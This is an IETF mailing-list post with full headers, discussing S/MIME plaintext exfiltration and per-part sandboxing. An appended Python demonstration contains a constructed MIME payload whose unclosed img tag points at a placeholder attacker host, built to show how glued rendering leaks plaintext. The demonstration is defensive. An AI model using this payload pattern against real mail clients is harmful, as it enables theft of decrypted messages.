Re: [lamps] More mail madness?

Richard Barnes <rlb@ipv.sx> Mon, 14 May 2018 16:39 UTC

Return-Path: <rlb@ipv.sx>
X-Original-To: ietf@ietfa.amsl.com
Delivered-To: ietf@ietfa.amsl.com
Received: from localhost (localhost [127.0.0.1]) by ietfa.amsl.com (Postfix) with ESMTP id 6B3AE12DA04 for <ietf@ietfa.amsl.com>; Mon, 14 May 2018 09:39:42 -0700 (PDT)
X-Virus-Scanned: amavisd-new at amsl.com
X-Spam-Flag: NO
X-Spam-Score: -1.909
X-Spam-Level:
X-Spam-Status: No, score=-1.909 tagged_above=-999 required=5 tests=[BAYES_00=-1.9, DKIM_SIGNED=0.1, DKIM_VALID=-0.1, HTML_MESSAGE=0.001, RCVD_IN_DNSWL_NONE=-0.0001, T_DKIMWL_WL_MED=-0.01] autolearn=unavailable autolearn_force=no
Authentication-Results: ietfa.amsl.com (amavisd-new); dkim=pass (2048-bit key) header.d=ipv-sx.20150623.gappssmtp.com
Received: from mail.ietf.org ([4.31.198.44]) by localhost (ietfa.amsl.com [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id pQ2s8XKFaUb2 for <ietf@ietfa.amsl.com>; Mon, 14 May 2018 09:39:39 -0700 (PDT)
Received: from mail-ot0-x230.google.com (mail-ot0-x230.google.com [IPv6:2607:f8b0:4003:c0f::230]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (No client certificate requested) by ietfa.amsl.com (Postfix) with ESMTPS id 18352126C22 for <ietf@ietf.org>; Mon, 14 May 2018 09:39:39 -0700 (PDT)
Received: by mail-ot0-x230.google.com with SMTP id l13-v6so15032406otk.9 for <ietf@ietf.org>; Mon, 14 May 2018 09:39:39 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=ipv-sx.20150623.gappssmtp.com; s=20150623; h=mime-version:references:in-reply-to:from:date:message-id:subject:to :cc; bh=wjiXdsMOWPRpKvL1Wj2bBS8TmnxiFBgbGBx4nZiKj0s=; b=XK7B8wYT0Rw4FNBH8YNTqYaZml64NMfMOdEUP2G1osJpg9EYLRAYY8kwWXP5sJj7P0 xXiEYvMHPoBciDIRXGlnBr+K4Pc42oCqGTRWFr/tbRv3dLuvkpZsgibq2xuz4NFZnk+S 0ShWlpo7DzEA9vMpSVu3o5h+nnGz7ybaN0NPHTzycfrQJ7/BzrxAPzgfaD+nyPrePsR5 vPmdfqc/Ae1dw5xdz7IC7yyAL5rvE+tr519S/MPLCi7Utt7/OyFmvs2E75bhU9GRWg50 KEeIqdSmbsYW7+zXbF4x+PmEgfDTsDNhL0eaP18dIjMZq98r9GLD2UjLKhzQyToxWLyk 5hbw==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20161025; h=x-gm-message-state:mime-version:references:in-reply-to:from:date :message-id:subject:to:cc; bh=wjiXdsMOWPRpKvL1Wj2bBS8TmnxiFBgbGBx4nZiKj0s=; b=gpe1PuW8ezuyIzaQwxLeZhhUop9XmOOooqTRO4+QrhytKzgr0K9tP8rEK/PAf4wB6q TXUsrv0l0HrE2e9E8gp5i3TXZ+z8HWnVYo/t2jzqio53GJhB6Fc0Bn9KLvLHU4mAJNN0 2bDXJYg1FAzDfsUOkVXQgQqFJfSs5nO3csAISqw5sAnSMg/QhVzrTPcBmA6wTiYMJVjv 0ZssVwe4f6x5KcYExuHwii77qa++m/nFueLq8iWQVsEAxWWdGpqMCMxLKsd5IIanSC/9 z9W9qZ+cE8twCtD/C96XXIT9FhF5NH3DcrTKMVu03yOMeR2XgDuYpS0jYHyOoFg3p28k momg==
X-Gm-Message-State: ALKqPwfikDU7a2bPWrIJSPXOUQaV1ZBdM5gazQhGhBhtSxMhQdQtRr// 66M8Xxa5zIH1zBgpdAImLYWxAhPp6nb2QHD4R5ubDQ==
X-Google-Smtp-Source: AB8JxZoWa+7n6RtJ83wm13gbBTOw+4ue7K9U5snv7vk0gpGi2FDRiw6vSBX//wuQOaSWnu7I0Vst5JQWiEEKxfvn+6Q=
X-Received: by 2002:a9d:4b8f:: with SMTP id k15-v6mr7959366otf.248.1526315978422; Mon, 14 May 2018 09:39:38 -0700 (PDT)
MIME-Version: 1.0
References: <CAMm+LwiOfdptL6u=SyCtQnz7xKrJD6HTDkKs+JGeHf54CSiv8A@mail.gmail.com> <B0CE44DF-DC7C-4411-B1CC-30B87E38D3F6@vigilsec.com> <51B631EC-78B3-4FF4-A82C-725A029F3DB3@nohats.ca> <C8E07D79-DFC5-4DA5-981B-26AA91A04D09@vigilsec.com>
In-Reply-To: <C8E07D79-DFC5-4DA5-981B-26AA91A04D09@vigilsec.com>
From: Richard Barnes <rlb@ipv.sx>
Date: Mon, 14 May 2018 12:39:27 -0400
Message-ID: <CAL02cgQGew0=5s-ipyJSD=kp8+uK5juYFYUdepWeDFjf6raqsw@mail.gmail.com>
Subject: Re: [lamps] More mail madness?
To: Russ Housley <housley@vigilsec.com>
Cc: Paul Wouters <paul@nohats.ca>, spasm@ietf.org, Phillip Hallam-Baker <phill@hallambaker.com>, IETF <ietf@ietf.org>
Content-Type: multipart/alternative; boundary="000000000000b58b43056c2d2121"
Archived-At: <https://mailarchive.ietf.org/arch/msg/ietf/EpwF6VXh0dl1noElKd9Qoa48V0M>
X-BeenThere: ietf@ietf.org
X-Mailman-Version: 2.1.22
Precedence: list
List-Id: IETF-Discussion <ietf.ietf.org>
List-Unsubscribe: <https://www.ietf.org/mailman/options/ietf>, <mailto:ietf-request@ietf.org?subject=unsubscribe>
List-Archive: <https://mailarchive.ietf.org/arch/browse/ietf/>
List-Post: <mailto:ietf@ietf.org>
List-Help: <mailto:ietf-request@ietf.org?subject=help>
List-Subscribe: <https://www.ietf.org/mailman/listinfo/ietf>, <mailto:ietf-request@ietf.org?subject=subscribe>
X-List-Received-Date: Mon, 14 May 2018 16:39:42 -0000

Russ: Is there some more work to be done here to address the CBC/CFB
issues?  Even if the encapsulation has AEAD support, maybe there's some
negotiation thingy?

On Mon, May 14, 2018, 12:37 Russ Housley <housley@vigilsec.com> wrote:

>
> On May 14, 2018, at 12:35 PM, Paul Wouters <paul@nohats.ca> wrote:
>
> On May 14, 2018, at 12:29, Russ Housley <housley@vigilsec.com> wrote:
>
> We are working on text for S/MIME that says that each portion of a MIME
> multi-part needs to be handled in its own sandbox.  The direct exfiltration
> that is described happens because the mail user agent glues the various
> portions together for display to the user, which in the example on the web
> page causes an image to be fetched from the attacker's website with the
> message plaintext as part of the URL.
>
>
> So that’s the bandaid. What and where will work be done on a solution?
>
>
> LAMPS just sent an update to the S/MIME message document to the IESG.  My
> guess is that there will be discussion on the spasm@ietf.org mail list.
>
> Russ
>
> _______________________________________________
> Spasm mailing list
> Spasm@ietf.org
> https://www.ietf.org/mailman/listinfo/spasm
>
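The "each portion of a MIME multi-part needs to be handled in its own sandbox" mitigation that Russ describes above can be illustrated with a small model of the two rendering strategies. This is an added example, not code from the thread, from LAMPS or from any mail user agent: the message below is constructed for the demonstration, `attacker.invalid` is a placeholder domain, and "gluing" is modelled as plain concatenation of the parts' contents before a single HTML parse, which is a simplification of what a real MUA does.

```python
import email
from email import policy
from html.parser import HTMLParser

# Constructed sample message (not a real capture). The first HTML part leaves an
# <img> tag open; the plaintext part sits between it and the part that closes it.
CONSTRUCTED_MESSAGE = """\
From: sender@example.invalid
To: victim@example.invalid
Subject: constructed sample
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="part"

--part
Content-Type: text/html

<p>Hello</p><img src="https://attacker.invalid/collect?
--part
Content-Type: text/plain

Secret plaintext that should never leave the client
--part
Content-Type: text/html

">
--part--
"""


class ImgSrcCollector(HTMLParser):
    """Collect the src attribute of every <img> tag, i.e. the URLs a renderer would fetch."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            for name, value in attrs:
                if name == "src" and value is not None:
                    self.sources.append(value)


def image_sources(html_text):
    """Parse one HTML document and return the image URLs it would cause to be fetched."""
    collector = ImgSrcCollector()
    collector.feed(html_text)
    collector.close()  # an <img ...> still open at end of input is not a complete tag
    return collector.sources


def parts_of(raw_message):
    """Return the decoded body of each leaf part of a multipart message, in order."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    return [part.get_content() for part in msg.iter_parts()]


def render_glued(raw_message):
    """Vulnerable model: all parts are joined into one document and parsed once.

    The open <img src=" in part 1 is only closed by the "> in part 3, so the
    plaintext of part 2 ends up inside the URL that would be fetched.
    """
    return image_sources("".join(parts_of(raw_message)))


def render_sandboxed(raw_message):
    """Hardened model: every part is parsed by its own parser instance.

    Markup cannot span parts, so an unclosed tag in one part never captures the
    content of another; the result is the per-part list of fetched URLs.
    """
    return [image_sources(part) for part in parts_of(raw_message)]


if __name__ == "__main__":
    print("glued:    ", render_glued(CONSTRUCTED_MESSAGE))
    print("sandboxed:", render_sandboxed(CONSTRUCTED_MESSAGE))
```

Running it shows the difference directly: the glued rendering yields one image URL on the placeholder host whose query string contains the text of the plaintext part, while the sandboxed rendering yields no image URL from any part, because neither HTML fragment is a complete tag on its own.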